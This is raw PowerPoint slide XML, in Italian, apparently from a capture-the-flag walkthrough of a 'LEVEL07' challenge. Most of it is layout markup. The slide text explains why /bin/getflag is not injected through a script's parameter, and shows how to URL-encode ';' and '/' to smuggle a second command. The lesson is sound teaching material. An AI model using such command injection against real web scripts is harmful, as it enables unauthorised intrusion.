            <a:ext cx="6413548" cy="859611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;1849;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7454F7A-344C-9681-1763-73EF54089FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1383776"/>
            <a:ext cx="4156364" cy="107805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2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" marR="0" lvl="2" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" marR="0" lvl="5" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" marR="0" lvl="6" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" marR="0" lvl="7" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" marR="0" lvl="8" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Grazie al nostro studio del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LEVEL07 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>sappiamo che la funzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>prende in input solo un argomento.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;1849;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6493DB17-BA33-AEF5-C33A-D388A9CDAEE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2350497"/>
            <a:ext cx="4156364" cy="136252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2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" marR="0" lvl="2" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" marR="0" lvl="5" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" marR="0" lvl="6" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" marR="0" lvl="7" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" marR="0" lvl="8" indent="-330200" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Quindi lo script index estrae solo il valore “user” e lo assegna alla variabile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>$username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>e quindi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/bin/getflag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>non viene iniettato. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F795E7CF-4B1E-FE61-2CF3-D8D86FB5A963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:grayscl/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="275926" y="1694763"/>
            <a:ext cx="623726" cy="655734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357762918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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>url encoding</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113C3EE9-131C-2C30-ECA8-283D8C653A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840484" y="1119494"/>
            <a:ext cx="7578315" cy="100320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152400" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Dato un carattere speciale per ottenere il suo URL ENCODING: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>si individua il suo codice ASCII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lo si scrive in esadecimale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>si inserisce il carattere di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>«%»</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7944C0-9D17-67CC-B06C-BA5231872DFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067521" y="3107689"/>
            <a:ext cx="2315497" cy="35797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0" indent="0" algn="ctr">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CARATTERE «;»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE88A7A-5B1E-C2FE-0015-E89BF8DB9B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840484" y="3728237"/>
            <a:ext cx="3338629" cy="11313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r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Codice ASCII in base 10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Codice ASCII in esadecimale: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Codice URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3B</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFE95AB-6872-2A5B-041B-5EBAC5095BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810093" y="3728237"/>
            <a:ext cx="3338629" cy="71497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r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Codice ASCII in base 10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Codice ASCII in esadecimale: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2F</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Codice URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
